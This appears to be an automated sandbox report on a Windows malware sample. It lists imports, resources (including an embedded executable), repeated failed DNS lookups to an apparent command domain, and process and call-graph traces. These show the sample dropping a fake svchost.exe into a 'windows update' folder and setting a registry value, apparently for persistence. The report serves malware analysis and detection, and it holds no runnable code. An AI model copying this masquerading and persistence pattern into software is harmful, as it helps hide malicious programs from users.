    RT_ICON0x555c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
    RT_ICON0x58440x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
    RT_ICON0x596c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
    RT_ICON0x68140x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
    RT_ICON0x70bc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
    RT_ICON0x76240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
    RT_ICON0x9bcc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
    RT_ICON0xac740x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
    RT_ICON0xb0dc0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
    RT_ICON0xb3c40x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
    RT_ICON0xb4ec0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
    RT_ICON0xc3940x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
    RT_ICON0xcc3c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
    RT_ICON0xd1a40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
    RT_ICON0xf74c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
    RT_ICON0x107f40x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
    RT_MENU0x10c5c0x4adataEnglishUnited States0.8648648648648649
    RT_DIALOG0x10ca80x12cdataEnglishUnited States0.5933333333333334
    RT_STRING0x10dd40x38dataEnglishUnited States0.5714285714285714
    RT_ACCELERATOR0x10e0c0x10dataEnglishUnited States1.25
    RT_RCDATA0x10e1c0x14400PE32 executable (GUI) Intel 80386, for MS WindowsEnglishUnited States0.2518446180555556
    RT_GROUP_ICON0x2521c0x76dataEnglishUnited States0.6440677966101694
    RT_GROUP_ICON0x252940x76dataEnglishUnited States0.6610169491525424
    RT_MANIFEST0x2530c0x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535
    DLLImport
    KERNEL32.dllTerminateProcess, GetStartupInfoA, GetCurrentProcess, Sleep, InterlockedExchange, UnhandledExceptionFilter, GetModuleHandleA, SetUnhandledExceptionFilter, IsDebuggerPresent, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, CreateProcessA, FreeResource, CloseHandle, WriteFile, CreateFileA, CreateDirectoryA, SizeofResource, LockResource, LoadResource, FindResourceA, InterlockedCompareExchange
    USER32.dllDialogBoxParamA, DestroyWindow, DefWindowProcA, BeginPaint, FillRect, EndPaint, PostQuitMessage, EndDialog, SetTimer, InvalidateRect, UpdateWindow, ShowWindow, CreateWindowExA, RegisterClassExA, LoadCursorA, LoadIconA, DispatchMessageA, TranslateMessage, TranslateAcceleratorA, GetMessageA, LoadAcceleratorsA, LoadStringA
    GDI32.dllSetBkColor, SetTextColor, GetStockObject, CreateSolidBrush, SelectObject, SetDCBrushColor, CreateCompatibleBitmap, Ellipse, BitBlt, DeleteObject, TextOutA, SetDCPenColor, MoveToEx, CreateCompatibleDC, LineTo
    ADVAPI32.dllRegCloseKey, RegSetValueExA, RegCreateKeyA, GetUserNameA
    MSVCP90.dll??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z, ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z, ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z, ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
    MSVCR90.dll_crt_debugger_hook, _except_handler4_common, ?terminate@@YAXXZ, _invoke_watson, _controlfp_s, __p__fmode, __set_app_type, exit, sprintf, _unlock, __dllonexit, _encode_pointer, _lock, _onexit, _decode_pointer, _amsg_exit, __getmainargs, _cexit, _exit, _XcptFilter, _ismbblead, memset, _acmdln, _initterm, _initterm_e, _configthreadlocale, __setusermatherr, _adjust_fdiv, __p__commode
    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States
    TimestampSource PortDest PortSource IPDest IP
    Sep 28, 2024 22:25:31.155764103 CEST5019153192.168.2.81.1.1.1
    Sep 28, 2024 22:25:31.215683937 CEST53501911.1.1.1192.168.2.8
    Sep 28, 2024 22:25:35.484788895 CEST5623353192.168.2.81.1.1.1
    Sep 28, 2024 22:25:35.543428898 CEST53562331.1.1.1192.168.2.8
    Sep 28, 2024 22:25:40.406672955 CEST5486253192.168.2.81.1.1.1
    Sep 28, 2024 22:25:40.434214115 CEST53548621.1.1.1192.168.2.8
    Sep 28, 2024 22:25:45.408895969 CEST6298653192.168.2.81.1.1.1
    Sep 28, 2024 22:25:45.629892111 CEST53629861.1.1.1192.168.2.8
    Sep 28, 2024 22:25:50.537753105 CEST6239253192.168.2.81.1.1.1
    Sep 28, 2024 22:25:50.565922022 CEST53623921.1.1.1192.168.2.8
    Sep 28, 2024 22:25:55.390809059 CEST5285153192.168.2.81.1.1.1
    Sep 28, 2024 22:25:55.411351919 CEST53528511.1.1.1192.168.2.8
    Sep 28, 2024 22:26:00.391190052 CEST6526653192.168.2.81.1.1.1
    Sep 28, 2024 22:26:00.485006094 CEST53652661.1.1.1192.168.2.8
    Sep 28, 2024 22:26:05.422404051 CEST5081753192.168.2.81.1.1.1
    Sep 28, 2024 22:26:05.450438976 CEST53508171.1.1.1192.168.2.8
    Sep 28, 2024 22:26:10.453543901 CEST6476453192.168.2.81.1.1.1
    Sep 28, 2024 22:26:10.505712032 CEST53647641.1.1.1192.168.2.8
    Sep 28, 2024 22:26:15.390979052 CEST6347953192.168.2.81.1.1.1
    Sep 28, 2024 22:26:15.442718029 CEST53634791.1.1.1192.168.2.8
    Sep 28, 2024 22:26:20.406774044 CEST5040153192.168.2.81.1.1.1
    Sep 28, 2024 22:26:20.490957022 CEST53504011.1.1.1192.168.2.8
    Sep 28, 2024 22:26:25.460042000 CEST5503053192.168.2.81.1.1.1
    Sep 28, 2024 22:26:25.486871958 CEST53550301.1.1.1192.168.2.8
    Sep 28, 2024 22:26:30.392472029 CEST5241953192.168.2.81.1.1.1
    Sep 28, 2024 22:26:30.428519011 CEST53524191.1.1.1192.168.2.8
    Sep 28, 2024 22:26:35.391170979 CEST4955553192.168.2.81.1.1.1
    Sep 28, 2024 22:26:35.455126047 CEST53495551.1.1.1192.168.2.8
    Sep 28, 2024 22:26:40.425937891 CEST5554453192.168.2.81.1.1.1
    Sep 28, 2024 22:26:40.432867050 CEST53555441.1.1.1192.168.2.8
    Sep 28, 2024 22:26:40.450548887 CEST6361553192.168.2.81.1.1.1
    Sep 28, 2024 22:26:40.477878094 CEST53636151.1.1.1192.168.2.8
    Sep 28, 2024 22:26:45.460422993 CEST5830453192.168.2.81.1.1.1
    Sep 28, 2024 22:26:45.570606947 CEST53583041.1.1.1192.168.2.8
    Sep 28, 2024 22:26:50.390885115 CEST5793753192.168.2.81.1.1.1
    Sep 28, 2024 22:26:50.414319992 CEST53579371.1.1.1192.168.2.8
    Sep 28, 2024 22:26:55.406958103 CEST6237653192.168.2.81.1.1.1
    Sep 28, 2024 22:26:55.435295105 CEST53623761.1.1.1192.168.2.8
    Sep 28, 2024 22:27:00.439062119 CEST5220653192.168.2.81.1.1.1
    Sep 28, 2024 22:27:00.505311966 CEST53522061.1.1.1192.168.2.8
    Sep 28, 2024 22:27:05.391020060 CEST5048853192.168.2.81.1.1.1
    Sep 28, 2024 22:27:05.455409050 CEST53504881.1.1.1192.168.2.8
    Sep 28, 2024 22:27:10.391166925 CEST5880953192.168.2.81.1.1.1
    Sep 28, 2024 22:27:10.419573069 CEST53588091.1.1.1192.168.2.8
    Sep 28, 2024 22:27:15.422765970 CEST6110353192.168.2.81.1.1.1
    Sep 28, 2024 22:27:15.433024883 CEST53611031.1.1.1192.168.2.8
    Sep 28, 2024 22:27:20.453717947 CEST5178353192.168.2.81.1.1.1
    Sep 28, 2024 22:27:20.496085882 CEST53517831.1.1.1192.168.2.8
    Sep 28, 2024 22:27:25.391027927 CEST5855953192.168.2.81.1.1.1
    Sep 28, 2024 22:27:25.423031092 CEST53585591.1.1.1192.168.2.8
    Sep 28, 2024 22:27:30.407042980 CEST5915953192.168.2.81.1.1.1
    Sep 28, 2024 22:27:30.414823055 CEST53591591.1.1.1192.168.2.8
    Sep 28, 2024 22:27:35.439645052 CEST5749053192.168.2.81.1.1.1
    Sep 28, 2024 22:27:35.693192959 CEST53574901.1.1.1192.168.2.8
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Sep 28, 2024 22:25:31.155764103 CEST192.168.2.81.1.1.10xdde5Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:35.484788895 CEST192.168.2.81.1.1.10x7e47Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:40.406672955 CEST192.168.2.81.1.1.10x2f96Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:45.408895969 CEST192.168.2.81.1.1.10xca3bStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:50.537753105 CEST192.168.2.81.1.1.10x1f42Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:55.390809059 CEST192.168.2.81.1.1.10xfdf7Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:00.391190052 CEST192.168.2.81.1.1.10x8dfcStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:05.422404051 CEST192.168.2.81.1.1.10x5cdfStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:10.453543901 CEST192.168.2.81.1.1.10xc06eStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:15.390979052 CEST192.168.2.81.1.1.10xc1f0Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:20.406774044 CEST192.168.2.81.1.1.10x9161Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:25.460042000 CEST192.168.2.81.1.1.10xf015Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:30.392472029 CEST192.168.2.81.1.1.10x4349Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:35.391170979 CEST192.168.2.81.1.1.10xe113Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:40.425937891 CEST192.168.2.81.1.1.10xfc2dStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:40.450548887 CEST192.168.2.81.1.1.10x6577Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:45.460422993 CEST192.168.2.81.1.1.10x64a9Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:50.390885115 CEST192.168.2.81.1.1.10x6f6dStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:55.406958103 CEST192.168.2.81.1.1.10x9e30Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:00.439062119 CEST192.168.2.81.1.1.10x3309Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:05.391020060 CEST192.168.2.81.1.1.10xb18Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:10.391166925 CEST192.168.2.81.1.1.10xfc52Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:15.422765970 CEST192.168.2.81.1.1.10xc5f2Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:20.453717947 CEST192.168.2.81.1.1.10x92f0Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:25.391027927 CEST192.168.2.81.1.1.10x7a7cStandard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:30.407042980 CEST192.168.2.81.1.1.10xb253Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:35.439645052 CEST192.168.2.81.1.1.10x3df6Standard query (0)ruslyz.ftp.narod.ruA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Sep 28, 2024 22:25:31.215683937 CEST1.1.1.1192.168.2.80xdde5Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:35.543428898 CEST1.1.1.1192.168.2.80x7e47Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:40.434214115 CEST1.1.1.1192.168.2.80x2f96Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:45.629892111 CEST1.1.1.1192.168.2.80xca3bName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:50.565922022 CEST1.1.1.1192.168.2.80x1f42Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:25:55.411351919 CEST1.1.1.1192.168.2.80xfdf7Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:00.485006094 CEST1.1.1.1192.168.2.80x8dfcName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:05.450438976 CEST1.1.1.1192.168.2.80x5cdfName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:10.505712032 CEST1.1.1.1192.168.2.80xc06eName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:15.442718029 CEST1.1.1.1192.168.2.80xc1f0Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:20.490957022 CEST1.1.1.1192.168.2.80x9161Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:25.486871958 CEST1.1.1.1192.168.2.80xf015Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:30.428519011 CEST1.1.1.1192.168.2.80x4349Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:35.455126047 CEST1.1.1.1192.168.2.80xe113Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:40.432867050 CEST1.1.1.1192.168.2.80xfc2dName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:40.477878094 CEST1.1.1.1192.168.2.80x6577Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:45.570606947 CEST1.1.1.1192.168.2.80x64a9Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:50.414319992 CEST1.1.1.1192.168.2.80x6f6dName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:26:55.435295105 CEST1.1.1.1192.168.2.80x9e30Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:00.505311966 CEST1.1.1.1192.168.2.80x3309Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:05.455409050 CEST1.1.1.1192.168.2.80xb18Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:10.419573069 CEST1.1.1.1192.168.2.80xfc52Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:15.433024883 CEST1.1.1.1192.168.2.80xc5f2Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:20.496085882 CEST1.1.1.1192.168.2.80x92f0Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:25.423031092 CEST1.1.1.1192.168.2.80x7a7cName error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:30.414823055 CEST1.1.1.1192.168.2.80xb253Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false
    Sep 28, 2024 22:27:35.693192959 CEST1.1.1.1192.168.2.80x3df6Name error (3)ruslyz.ftp.narod.runonenoneA (IP address)IN (0x0001)false

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:16:25:29
    Start date:28/09/2024
    Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe"
    Imagebase:0x920000
    File size:145'408 bytes
    MD5 hash:00A1B2DDC402CA4B20CC5F82F68092E6
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    Target ID:1
    Start time:16:25:29
    Start date:28/09/2024
    Path:C:\Users\user\AppData\Local\windows update\svchost.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\windows update\svchost.exe"
    Imagebase:0x670000
    File size:82'944 bytes
    MD5 hash:D759329B5FA8220EFE1161BFF8B9C5EB
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 36%, ReversingLabs
    Reputation:low
    Has exited:false

    Target ID:4
    Start time:16:25:42
    Start date:28/09/2024
    Path:C:\Users\user\AppData\Local\windows update\svchost.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\windows update\svchost.exe"
    Imagebase:0x670000
    File size:82'944 bytes
    MD5 hash:D759329B5FA8220EFE1161BFF8B9C5EB
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    Target ID:6
    Start time:16:25:50
    Start date:28/09/2024
    Path:C:\Users\user\AppData\Local\windows update\svchost.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\windows update\svchost.exe"
    Imagebase:0x670000
    File size:82'944 bytes
    MD5 hash:D759329B5FA8220EFE1161BFF8B9C5EB
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    Reset < >

      Execution Graph

      Execution Coverage:36.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:25.6%
      Total number of Nodes:125
      Total number of Limit Nodes:5
      execution_graph 309 921b22 329 921f04 309->329 311 921b2e GetStartupInfoA 312 921b5c 311->312 313 921b6e 312->313 314 921b75 Sleep 312->314 315 921b98 313->315 316 921b8e _amsg_exit 313->316 314->312 317 921bc1 315->317 318 921ba1 _initterm_e 315->318 316->317 319 921bd0 _initterm 317->319 320 921beb 317->320 318->317 322 921bbc __onexit 318->322 319->320 321 921bef InterlockedExchange 320->321 324 921bf7 __IsNonwritableInCurrentImage 320->324 321->324 323 921c86 _ismbblead 323->324 324->323 325 921ccb 324->325 328 921c70 exit 324->328 330 921000 LoadStringA LoadStringA 324->330 325->322 326 921cd4 _cexit 325->326 326->322 328->324 329->311 355 921460 LoadIconA LoadCursorA LoadIconA RegisterClassExA 330->355 332 921045 10 API calls 333 9210f2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 332->333 334 921125 6 API calls 332->334 333->333 333->334 335 9211c3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 334->335 336 92118c 334->336 338 9211eb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 335->338 337 921190 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 336->337 337->335 337->337 339 921277 RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI RegSetValueExA RegCloseKey 338->339 340 921244 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 338->340 341 9212c2 WriteFile 339->341 342 9212e5 FreeResource memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI CreateProcessA CreateWindowExA 339->342 340->339 340->340 341->342 343 9212de CloseHandle 341->343 344 92136e ShowWindow KiUserCallbackDispatcher LoadAcceleratorsA KiUserCallbackDispatcher 342->344 345 92141f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 342->345 343->342 346 9213a2 344->346 347 9213e8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 344->347 348 921a0c 7 API calls 345->348 350 9213b0 TranslateAcceleratorA 346->350 356 921a0c 347->356 349 92144c 348->349 349->324 352 9213c1 TranslateMessage DispatchMessageA 350->352 353 9213d7 KiUserCallbackDispatcher 350->353 352->353 353->347 353->350 354 921419 354->324 355->332 357 921a16 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 356->357 358 921a14 356->358 360 921ed6 _crt_debugger_hook 357->360 361 921ede GetCurrentProcess TerminateProcess 357->361 358->354 360->361 361->354 422 921f82 423 921fbe 422->423 425 921f94 422->425 424 921fb9 ?terminate@ 424->423 425->423 425->424 426 921de2 429 9221b8 426->429 428 921de7 428->428 430 9221ea GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 429->430 431 9221dd 429->431 432 9221e1 430->432 431->430 431->432 432->428 362 9215a0 363 9218a7 362->363 364 9215cd 362->364 376 9218c2 DefWindowProcA 363->376 377 9218e6 InvalidateRect 363->377 379 921913 363->379 365 9215d3 364->365 366 92184a 364->366 367 921835 SetTimer 365->367 368 9215de 365->368 369 921855 366->369 370 92188b DialogBoxParamA 366->370 367->379 371 9215e7 368->371 372 921828 PostQuitMessage 368->372 373 92185a DefWindowProcA 369->373 374 92187f DestroyWindow 369->374 370->379 371->376 380 9215f0 22 API calls 371->380 372->379 381 921a0c 7 API calls 373->381 374->379 375 921a0c 7 API calls 382 9219c5 375->382 378 921a0c 7 API calls 376->378 377->379 383 9218e0 378->383 379->375 384 921731 SetDCPenColor MoveToEx 380->384 385 921778 SetDCPenColor 380->385 386 921879 381->386 384->385 387 921795 385->387 388 9217c2 Ellipse 387->388 388->387 389 9217d7 BitBlt DeleteObject DeleteObject EndPaint 388->389 389->379 390 9219d0 391 921a04 390->391 392 9219db 390->392 393 9219f0 392->393 394 9219f5 EndDialog 392->394 394->391 395 921cb0 396 921cc4 _exit 395->396 397 921ccb 395->397 396->397 398 921cd4 _cexit 397->398 399 921cda __onexit 397->399 398->399 400 9214f0 402 921512 InvalidateRect 400->402 433 922400 434 921ac0 10 API calls 433->434 435 922405 434->435 436 921d01 438 921d0f __set_app_type _encode_pointer __p__fmode __p__commode 436->438 439 921dae _pre_c_init __RTC_Initialize 438->439 440 921dc8 439->440 441 921dbc __setusermatherr 439->441 446 92218a _controlfp_s 440->446 441->440 444 921dd6 _configthreadlocale 445 921ddf 444->445 447 921dcd 446->447 448 9221a6 _invoke_watson 446->448 447->444 447->445 448->447 403 921c9c _XcptFilter 404 921adc 409 921ac0 404->409 407 921b21 408 921b19 _amsg_exit 408->407 412 921a1b 409->412 411 921acd __getmainargs 411->407 411->408 419 921f04 412->419 414 921a27 _decode_pointer 415 921a4a 7 API calls 414->415 416 921a3e _onexit 414->416 420 921ab7 _unlock 415->420 417 921aae __onexit 416->417 417->411 419->414 420->417 421 921f5d _except_handler4_common

      Callgraph

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 921000-9210f0 LoadStringA * 2 call 921460 GetModuleHandleA FindResourceA LoadResource LockResource SizeofResource ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 3 9210f2-921123 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 0->3 4 921125-92118a ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 0->4 3->3 3->4 5 9211c3-921242 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 4->5 6 92118c 4->6 9 921277-9212c0 RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z RegSetValueExA RegCloseKey 5->9 10 921244-921275 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 5->10 7 921190-9211c1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 6->7 7->5 7->7 11 9212c2-9212dc WriteFile 9->11 12 9212e5-921368 FreeResource memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA CreateWindowExA 9->12 10->9 10->10 11->12 13 9212de-9212df CloseHandle 11->13 14 92136e-9213a0 ShowWindow KiUserCallbackDispatcher LoadAcceleratorsA KiUserCallbackDispatcher 12->14 15 92141f-92144f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 921a0c 12->15 13->12 16 9213a2-9213a8 14->16 17 9213e8-92141c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 921a0c 14->17 20 9213b0-9213bf TranslateAcceleratorA 16->20 22 9213c1-9213d1 TranslateMessage DispatchMessageA 20->22 23 9213d7-9213e6 KiUserCallbackDispatcher 20->23 22->23 23->17 23->20
      APIs
      • LoadStringA.USER32(?,00000067,Move_V,00000064), ref: 00921030
      • LoadStringA.USER32(?,0000006D,MOVE_V,00000064), ref: 0092103C
        • Part of subcall function 00921460: LoadIconA.USER32 ref: 00921499
        • Part of subcall function 00921460: LoadCursorA.USER32(00000000,00007F00), ref: 009214A6
        • Part of subcall function 00921460: LoadIconA.USER32 ref: 009214CF
        • Part of subcall function 00921460: RegisterClassExA.USER32(0000006B), ref: 009214DA
      • GetModuleHandleA.KERNEL32(00000000), ref: 00921047
